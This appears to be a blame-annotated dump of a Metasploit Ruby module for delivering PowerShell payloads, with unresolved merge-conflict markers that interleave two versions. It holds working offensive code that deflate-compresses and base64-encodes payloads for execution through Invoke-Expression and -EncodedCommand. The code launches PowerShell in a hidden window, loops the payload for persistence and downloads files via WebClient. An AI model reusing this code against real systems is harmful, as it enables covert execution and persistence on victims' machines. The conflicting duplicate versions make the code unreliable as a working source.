2013-07-04 16:44:44 +00:00
|
|
|
# -*- coding: binary -*-
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
require 'rex/exploitation/powershell'
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
2013-07-04 08:54:40 +00:00
|
|
|
require 'zlib'
|
2013-07-20 23:29:55 +00:00
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
|
|
|
|
module Msf
|
|
|
|
module Exploit::Powershell
|
|
|
|
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
class PshScript < Rex::Exploitation::Powershell::Script
|
|
|
|
end
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
|
|
|
OptBool.new('RUN_WOW64', [
|
|
|
|
false,
|
|
|
|
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
|
|
|
false
|
|
|
|
]),
|
|
|
|
OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
|
|
|
|
OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
|
|
|
|
OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
|
|
|
|
OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
2013-07-04 08:54:40 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super
|
2013-07-04 09:25:08 +00:00
|
|
|
register_options(
|
2013-07-04 11:09:46 +00:00
|
|
|
[
|
|
|
|
OptBool.new('PERSIST', [true, 'Run the payload in a loop', false]),
|
|
|
|
OptBool.new('PSH_OLD_METHOD', [true, 'Use powershell 1.0', false]),
|
2013-07-04 08:54:40 +00:00
|
|
|
OptBool.new('RUN_WOW64', [
|
2013-07-04 09:25:08 +00:00
|
|
|
true,
|
2013-07-04 08:54:40 +00:00
|
|
|
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
|
|
|
false
|
|
|
|
]),
|
2013-07-20 23:29:55 +00:00
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
# Reads script into a PshScript
|
|
|
|
#
|
|
|
|
def read_script(script)
|
|
|
|
return PshScript.new(script)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
# Insert substitutions into the powershell script
|
|
|
|
#
|
|
|
|
def make_subs(script, subs)
|
|
|
|
if ::File.file?(script)
|
|
|
|
script = ::File.read(script)
|
|
|
|
end
|
|
|
|
|
|
|
|
subs.each do |set|
|
|
|
|
script.gsub!(set[0],set[1])
|
|
|
|
end
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
# if datastore['VERBOSE']
|
|
|
|
# print_good("Final Script: ")
|
|
|
|
# script.each_line {|l| print_status("\t#{l}")}
|
|
|
|
# end
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
2013-07-04 08:54:40 +00:00
|
|
|
if datastore['VERBOSE']
|
|
|
|
print_good("Final Script: ")
|
|
|
|
script.each_line {|l| print_status("\t#{l}")}
|
|
|
|
end
|
2013-07-20 23:29:55 +00:00
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
return script
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Return an array of substitutions for use in make_subs
|
|
|
|
#
|
|
|
|
def process_subs(subs)
|
|
|
|
return [] if subs.nil? or subs.empty?
|
|
|
|
new_subs = []
|
|
|
|
subs.split(';').each do |set|
|
|
|
|
new_subs << set.split(',', 2)
|
|
|
|
end
|
|
|
|
return new_subs
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
# Return a gzip compressed powershell script
|
|
|
|
# Will invoke PSH modifiers as enabled
|
|
|
|
#
|
|
|
|
def compress_script(script_in, eof = nil)
|
|
|
|
# Build script object
|
|
|
|
psh = PshScript.new(script_in)
|
|
|
|
# Invoke enabled modifiers
|
|
|
|
datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
|
|
|
|
mod_method = k.split('::').last.intern
|
|
|
|
psh.send(mod_method)
|
|
|
|
end
|
|
|
|
return psh.compress_code(eof)
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
2013-07-04 08:54:40 +00:00
|
|
|
# Read in a powershell script stored in +script+
|
|
|
|
#
|
|
|
|
def read_script(script)
|
|
|
|
script_in = ''
|
|
|
|
begin
|
|
|
|
# Open script file for reading
|
|
|
|
fd = ::File.new(script, 'r')
|
|
|
|
while (line = fd.gets)
|
|
|
|
script_in << line
|
|
|
|
end
|
|
|
|
|
|
|
|
# Close open file
|
|
|
|
fd.close()
|
|
|
|
rescue Errno::ENAMETOOLONG, Errno::ENOENT
|
|
|
|
# Treat script as a... script
|
|
|
|
script_in = script
|
|
|
|
end
|
|
|
|
return script_in
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Return a zlib compressed powershell script
|
|
|
|
#
|
|
|
|
def compress_script(script_in, eof = nil)
|
|
|
|
|
|
|
|
# Compress using the Deflate algorithm
|
|
|
|
compressed_stream = ::Zlib::Deflate.deflate(script_in,
|
|
|
|
::Zlib::BEST_COMPRESSION)
|
|
|
|
|
|
|
|
# Base64 encode the compressed file contents
|
|
|
|
encoded_stream = Rex::Text.encode_base64(compressed_stream)
|
|
|
|
|
|
|
|
# Build the powershell expression
|
|
|
|
# Decode base64 encoded command and create a stream object
|
|
|
|
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
|
|
|
psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
|
|
|
# Read & delete the first two bytes due to incompatibility with MS
|
|
|
|
psh_expression << "$stream.ReadByte()|Out-Null;"
|
|
|
|
psh_expression << "$stream.ReadByte()|Out-Null;"
|
|
|
|
# Uncompress and invoke the expression (execute)
|
|
|
|
psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
|
|
|
|
psh_expression << "$(New-Object IO.Compression.DeflateStream("
|
|
|
|
psh_expression << "$stream,"
|
|
|
|
psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
|
|
|
|
psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
|
|
|
|
|
|
|
|
# If eof is set, add a marker to signify end of script output
|
|
|
|
if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
|
|
|
|
|
|
|
|
# Convert expression to unicode
|
|
|
|
unicode_expression = Rex::Text.to_unicode(psh_expression)
|
|
|
|
|
|
|
|
# Base64 encode the unicode expression
|
|
|
|
encoded_expression = Rex::Text.encode_base64(unicode_expression)
|
|
|
|
|
|
|
|
return encoded_expression
|
2013-07-20 23:29:55 +00:00
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Runs powershell in hidden window raising interactive proc msg
|
|
|
|
#
|
|
|
|
def run_hidden_psh(ps_code,ps_bin='powershell.exe')
|
|
|
|
ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
|
|
|
|
|
|
|
|
ps_wrapper = <<EOS
|
|
|
|
$si = New-Object System.Diagnostics.ProcessStartInfo
|
|
|
|
$si.FileName = "#{ps_bin}"
|
|
|
|
$si.Arguments = '#{ps_args}'
|
|
|
|
$si.UseShellExecute = $false
|
|
|
|
$si.RedirectStandardOutput = $true
|
|
|
|
$si.WindowStyle = 'Hidden'
|
|
|
|
$si.CreateNoWindow = $True
|
|
|
|
$p = [System.Diagnostics.Process]::Start($si)
|
|
|
|
EOS
|
|
|
|
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
return ps_wrapper.gsub("\n",';')
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
2013-07-04 08:54:40 +00:00
|
|
|
return ps_wrapper
|
2013-07-20 23:29:55 +00:00
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Creates cmd script to execute psh payload
|
|
|
|
#
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
def cmd_psh_payload(pay, old_psh=false)
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
2013-07-04 10:03:48 +00:00
|
|
|
def cmd_psh_payload(pay, old_psh=datastore['PSH_OLD_METHOD'], wow64=datastore['RUN_WOW64'])
|
2013-07-20 23:29:55 +00:00
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
# Allow powershell 1.0 format
|
|
|
|
if old_psh
|
|
|
|
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
|
|
|
|
else
|
|
|
|
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
|
|
|
|
end
|
|
|
|
# Run our payload in a while loop
|
|
|
|
if datastore['PERSIST']
|
|
|
|
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
|
|
|
sleep_time = rand(5)+5
|
|
|
|
psh_payload = "function #{fun_name}{#{psh_payload}};"
|
|
|
|
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
|
|
|
|
end
|
2013-07-20 23:29:55 +00:00
|
|
|
<<<<<<< HEAD
|
2013-07-04 16:44:44 +00:00
|
|
|
# Determine appropriate architecture, manual method reduces script size
|
|
|
|
ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
|
|
|
# Wrap in hidden runtime
|
|
|
|
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
|
|
|
# Convert to base64 for -encodedcommand execution
|
|
|
|
command = "%COMSPEC% /B /C start /min powershell.exe -Command \"#{psh_payload.gsub('"','\"')}\"\r\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Useful method cache
|
|
|
|
#
|
|
|
|
module PshMethods
|
|
|
|
|
|
|
|
#
|
|
|
|
# Convert binary to byte array, read from file if able
|
|
|
|
#
|
|
|
|
def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
|
|
|
|
code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
|
|
|
|
code = code.unpack('C*')
|
|
|
|
psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
|
|
|
|
lines = []
|
|
|
|
1.upto(code.length-1) do |byte|
|
|
|
|
if(byte % 10 == 0)
|
|
|
|
lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
|
|
|
|
else
|
|
|
|
lines.push ",0x#{code[byte].to_s(16)}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
return psh << lines.join("") + "\r\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Download file to host via PSH
|
|
|
|
#
|
|
|
|
def self.download(src,target=nil)
|
|
|
|
target ||= '$pwd\\' << src.split('/').last
|
|
|
|
return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Uninstall app
|
|
|
|
#
|
|
|
|
def self.uninstall(app,fuzzy=true)
|
|
|
|
match = fuzzy ? '-like' : '-eq'
|
|
|
|
return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Create secure string from plaintext
|
|
|
|
#
|
|
|
|
def self.secure_string(str)
|
|
|
|
return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# MISC
|
|
|
|
#
|
|
|
|
|
|
|
|
#
|
|
|
|
# Find PID of file locker
|
|
|
|
#
|
|
|
|
def self.who_locked_file?(filename)
|
|
|
|
return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def self.get_last_login(user)
|
|
|
|
return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
|
|
|
|
end
|
|
|
|
end
|
2013-07-20 23:29:55 +00:00
|
|
|
=======
|
2013-07-04 08:54:40 +00:00
|
|
|
# Determine appropriate architecture
|
2013-07-04 10:03:48 +00:00
|
|
|
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
2013-07-04 08:54:40 +00:00
|
|
|
# Wrap in hidden runtime
|
|
|
|
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
|
|
|
# Convert to base64 for -encodedcommand execution
|
|
|
|
command = "%COMSPEC% /B /C start powershell.exe -Command \"#{psh_payload.gsub("\n",';').gsub('"','\"')}\"\r\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Convert binary to byte array, read from file if able
|
|
|
|
#
|
|
|
|
def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
|
|
|
|
code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
|
|
|
|
code = code.unpack('C*')
|
|
|
|
psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
|
|
|
|
lines = []
|
|
|
|
1.upto(code.length-1) do |byte|
|
|
|
|
if(byte % 10 == 0)
|
|
|
|
lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
|
|
|
|
else
|
|
|
|
lines.push ",0x#{code[byte].to_s(16)}"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
psh << lines.join("") + "\r\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
2013-07-20 23:29:55 +00:00
|
|
|
>>>>>>> master
|
2013-07-04 16:44:44 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|